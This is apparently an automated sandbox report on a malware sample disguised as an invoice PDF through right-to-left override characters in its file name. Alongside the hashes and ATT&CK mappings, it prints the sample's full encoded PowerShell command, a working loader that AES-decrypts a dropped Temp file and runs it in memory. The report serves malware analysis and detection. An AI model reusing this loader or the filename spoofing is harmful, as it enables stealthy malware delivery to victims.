b3f8261addf5c790f042a51bb1a890a061f12e2b5a69fef4fd096312968129b4

General

Target

invoice‮f؜d؜p؜..exe
Size

1011KB
MD5

e966081889406e72da8e58d5266e11ce
SHA1

2c3dc94621292b3a97904faf476c1f944efbbac8
SHA256

b3f8261addf5c790f042a51bb1a890a061f12e2b5a69fef4fd096312968129b4
SHA512

7f84db74ce0e16667b4509d8563e11bc3f9298dda883bdb43f10a34d8b799ab586118222c597b703ab92666b74715a7c34a169ab98efb9df6567f5576b8dca7f
SSDEEP

24576:MtbIyTFaXPCDslnPQd/MD3ZRfchorKTGLz1:Mt8yhaXqSs/MDp5woCw1

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3040	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3040	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3040	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 3040	2364	invoice‮f؜d؜p؜..exe	29
PID 2364 wrote to memory of 3040	2364	invoice‮f؜d؜p؜..exe	29
PID 2364 wrote to memory of 3040	2364	invoice‮f؜d؜p؜..exe	29

C:\Users\Admin\AppData\Local\Temp\invoice‮f؜d؜p؜..exe
"C:\Users\Admin\AppData\Local\Temp\invoice‮f؜d؜p؜..exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEUALAAgADAAeAA0AEMALAAgADAAeABBADcALAAgADAAeAAzAEIALAAgADAAeABDADcALAAgADAAeAA3ADIALAAgADAAeAA3AEIALAAgADAAeAA2ADkALAAgADAAeABGAEUALAAgADAAeABCAEEALAAgADAAeAAwAEYALAAgADAAeAA2ADkALAAgADAAeABEAEYALAAgADAAeAA1ADkALAAgADAAeAA1ADQALAAgADAAeAA2AEIALAAgADAAeAAxAEQALAAgADAAeAAyADUALAAgADAAeAA0ADUALAAgADAAeABGAEEALAAgADAAeABDADYALAAgADAAeAA2ADIALAAgADAAeAA3ADEALAAgADAAeAA3ADMALAAgADAAeAAyAEQALAAgADAAeABEADUALAAgADAAeAAwAEMALAAgADAAeAA4AEUALAAgADAAeABEADkALAAgADAAeAAyADYALAAgADAAeABCAEEALAAgADAAeAAxAEEAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADcAQgAsACAAMAB4AEEANQAsACAAMAB4ADMARgAsACAAMAB4AEMAOQAsACAAMAB4AEEAMgAsACAAMAB4ADQAQgAsACAAMAB4ADIAMAAsACAAMAB4ADIANAAsACAAMAB4ADUARAAsACAAMAB4AEEAOAAsACAAMAB4ADcAOAAsACAAMAB4ADAARgAsACAAMAB4ADAARQAsACAAMAB4ADUAQQAsACAAMAB4ADEANwAsACAAMAB4ADYAOQApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\file-26701.putik

Filesize
21KB

MD5
ab2902899ceee96dbe778d8acc97550f

SHA1
e8030cb72bf7f4bfc43d8012b054c70c26e69c3c

SHA256
3274796b28bded2458df61badeba9ff59cfd3ea2f198bc9314f007b43488fab7

SHA512
f7b46a97d31b0cdef34c93e87153926b2f953d7cef0bf998e87cc6e704e89f345e8cb52cfd79da5a7f81807967caeaf058dd19dd821018df47b7b71705e7be1a

Download Submit
memory/3040-5-0x000007FEF57BE000-0x000007FEF57BF000-memory.dmp

Filesize
4KB

Download
memory/3040-6-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/3040-8-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/3040-7-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/3040-9-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/3040-10-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/3040-11-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/3040-12-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/3040-14-0x0000000002AF0000-0x0000000002AFA000-memory.dmp

Filesize
40KB

Download
memory/3040-15-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing